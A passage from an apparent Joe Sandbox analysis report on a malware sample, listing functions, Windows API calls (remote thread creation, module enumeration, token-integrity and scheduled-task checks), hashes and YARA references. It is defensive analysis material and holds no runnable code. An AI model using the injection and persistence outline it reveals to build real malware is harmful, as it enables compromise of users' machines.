                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              Function 00401CF0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              Function 004034C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              Function 0043A650 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: VUUU
                                                                                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                                                                                              • Opcode ID: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction ID: 83c8b6d4ae9392d60502dd360fb7ca1817b1c3f4776dddc770d92cd40da689bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FC1F571A4065647C728CF69C5902BAFBF1BF98310F08A12FD4D2D6B81E338E555CB55
                                                                                                                                                                                                              Function 00423970 Relevance: .8, Instructions: 833COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction ID: 49f4f21d9b48f79dac2c560b4f9f45e3af11d3fe5a8b8c575f21095663944224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 466217302083668FE711CF349998AAB7BE4EF9B342F448559E881C7372DB35C949C799
                                                                                                                                                                                                              Function 00447EDD Relevance: .8, Instructions: 789COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                              • Instruction ID: 819080bdcba4aba2f410b402834f39c633db381555cbfe7eca53d93c247e6cbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6362AD70E00A269BDB0CCF55C8906EDB7B2FF84311F14826EC81667B84DB78A955DF94
                                                                                                                                                                                                              Function 004356D0 Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction ID: c7ae1df08a76fa61e3c99c46e8343ff6a04015de72be0cc750c2f716a6a279e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F442D171900A499FDB14DFA8C880AEFBBF5EF4C308F14555EE446A7341D738A946CBA8
                                                                                                                                                                                                              Function 004460F0 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction ID: 296f88951ecf7cea7bff09f9537e53bf2d2ecc764958e0785ba560d75f276c2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6112E5306017849FEB25CF18C5906AEBBF1BF46310F16855AE8E54B792C338ED46CB56
                                                                                                                                                                                                              Function 00445A20 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction ID: 373094f0e44d4ed5b4a76297d3e75846c5555569b6fb32489a2bef93388bd825
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C812D230A00B859FEF21CF18C590AAEB7F1FF95310F14855AE8A64B792C338AD46CB55
                                                                                                                                                                                                              Function 004467C0 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction ID: cfa054cb93e044cdae65f2de48f0eb828664dc1768648188419bb013471483e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA12D530A057849FEB25CF18C490AAABBF1EF53314F15855EE8E54B391C338AD46CB66
                                                                                                                                                                                                              Function 00444790 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction ID: c484f8b887487c68eb1831faa77cd2835b2ef54b83a3a9b38c3ea20a6c7484b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA12D430A017859FEB21CF18C58079ABBF1FF96310F19855AE8A59B381D338ED46CB65
                                                                                                                                                                                                              Function 00442340 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction ID: 9417f9ed4064ddd1c3f6edb80d8f66b01d291d1ab21ea86703028fde516e46eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E02F530A007459FEB20CF28C6906AFB7F1FF41310F55855AF8A54B391D778A986CBA5
                                                                                                                                                                                                              Function 00442FA0 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                              Function 00443C00 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                              Function 004416D0 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                              Function 00408FA0 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                              Function 0043AC30 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                              Function 00440880 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                              Function 0044A8A0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                              Function 0043C0D0 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                              Function 00406B60 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
